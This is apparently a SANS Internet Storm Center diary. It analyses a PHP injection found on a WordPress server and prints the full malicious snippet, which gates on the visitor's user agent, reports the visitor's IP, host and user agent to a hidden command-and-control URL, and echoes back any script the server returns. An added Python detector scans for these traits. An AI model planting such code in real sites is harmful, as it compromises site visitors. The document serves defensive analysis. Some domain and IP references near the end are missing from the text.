SANS ISC Internet Storm Center


Possible Wordpress Botnet C&C:

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Thanks to one of our readers for sending us this snippet of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):


#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */

/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610))) {

  # Assemble a URL like[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610 = "http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

  # check if we have the curl extension installed

  if (function_exists('curl_init') && function_exists('curl_exec')) {
    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL, $wp_mezd098610);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_8610mezd = curl_exec ($ch);
  }

  # if we don't have curl, try file_get_contents which requires allow_url_fopen.

  elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }

  # or try fopen as a last resort

  elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, "r")); }
}

if (substr($wp_8610mezd,1,3) === 'scr') { echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".
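As an added example (this is not code from the diary, the reader, or the snippet's author), the following Python script turns the behaviours commented above into a detector a site owner can run over a web root: it flags PHP files in which several of the indicators co-occur (the #hex# marker, error suppression, the user-agent gate, a remote fetch, and the "scr" echo), and it rebuilds the C&C URL that the snippet splits across concatenated string literals so the hostname can be blocked or searched for in proxy logs. The SAMPLE string is a constructed, condensed copy of the snippet used for a self-test; the regexes are assumptions derived from this one specimen, not a general webshell signature.

```python
#!/usr/bin/env python3
"""Scan PHP files for the injected WordPress snippet described in this diary.

Added example; not code from the ISC post or from the snippet's author.
INDICATORS are derived from the snippet shown above, and SAMPLE is a
constructed, condensed copy of it that serves as a built-in self-test.
"""
import re
import sys
from pathlib import Path

# One regex per behaviour visible in the snippet: the leading #hex# marker,
# error suppression, the user-agent gate that excludes crawlers, a remote
# fetch, and echoing the response when bytes 1-3 are "scr" (as in "<script").
INDICATORS = [
    ("hex_marker", re.compile(r"^#[0-9a-f]{6}#", re.M)),
    ("error_suppression",
     re.compile(r"error_reporting\(0\);\s*@ini_set\('display_errors',\s*0\)")),
    ("ua_gate",
     re.compile(r"preg_match\s*\('/Gecko\|MSIE/i'.*?!preg_match\s*\('/bot/i'", re.S)),
    ("remote_fetch", re.compile(r"curl_init|file_get_contents|stream_get_contents")),
    ("script_echo", re.compile(r"substr\(\$\w+,\s*1,\s*3\)\s*===\s*'scr'")),
]

# A run of two or more quoted literals joined with '.', which is how the
# snippet hides its hostname from a plain grep for the domain name.
QUOTED = "\"[^\"]*\"|'[^']*'"
CONCAT = re.compile(r"((?:%s)(?:\s*\.\s*(?:%s))+)" % (QUOTED, QUOTED))
LITERAL = re.compile(QUOTED)


def join_literals(chain):
    """Concatenate the quoted pieces of a '.'-joined PHP string expression."""
    return "".join(lit[1:-1] for lit in LITERAL.findall(chain))


def recover_urls(php_source):
    """Rebuild every http(s) URL that was split across concatenated literals."""
    urls = []
    for chain in CONCAT.findall(php_source):
        joined = join_literals(chain)
        if joined.startswith(("http://", "https://")):
            urls.append(joined)
    return urls


def scan(php_source):
    """Return which indicators fire, any recovered URLs, and an overall verdict."""
    hits = [name for name, rx in INDICATORS if rx.search(php_source)]
    return {
        "indicators": hits,
        "urls": recover_urls(php_source),
        # Require several independent indicators so a lone curl_init() in
        # legitimate plugin code does not trip the verdict on its own.
        "suspicious": len(hits) >= 3,
    }


def scan_tree(root):
    """Yield (path, result) for every suspicious .php file under root."""
    for path in Path(root).rglob("*.php"):
        try:
            result = scan(path.read_text(errors="replace"))
        except OSError:
            continue
        if result["suspicious"]:
            yield path, result


# Constructed self-test input: a condensed copy of the snippet in the diary.
SAMPLE = r'''#2b8008#
error_reporting(0); @ini_set('display_errors',0);
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if ((preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))) {
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);
  if (function_exists('curl_init') && function_exists('curl_exec')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wp_mezd098610);
    $wp_8610mezd = curl_exec($ch);
  } elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {
    $wp_8610mezd = @file_get_contents($wp_mezd098610);
  }
}
if (substr($wp_8610mezd,1,3) === 'scr') { echo $wp_8610mezd; }
'''

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(scan(SAMPLE))  # no path given: run the self-test on SAMPLE
    else:
        for path, result in scan_tree(sys.argv[1]):
            print(path, result["indicators"], result["urls"])
```

Run it with the web root as the first argument (for example `python3 scan.py /var/www/html`); without an argument it scans the embedded SAMPLE and reports all five indicators plus the recovered `http://errorcontent.com/content/?ip=` prefix. Because the verdict needs three indicators, a clean site's own curl or file_get_contents calls will not be reported, while a re-obfuscated copy that renames the variables but keeps the same logic still will.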


I haven't been able to retrieve any content from Has anybody else seen this code, or is able to retrieve content from ?

According to whois, is owned by a Chinese organization. It currently resolves to, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.

Johannes B. Ullrich, Ph.D.
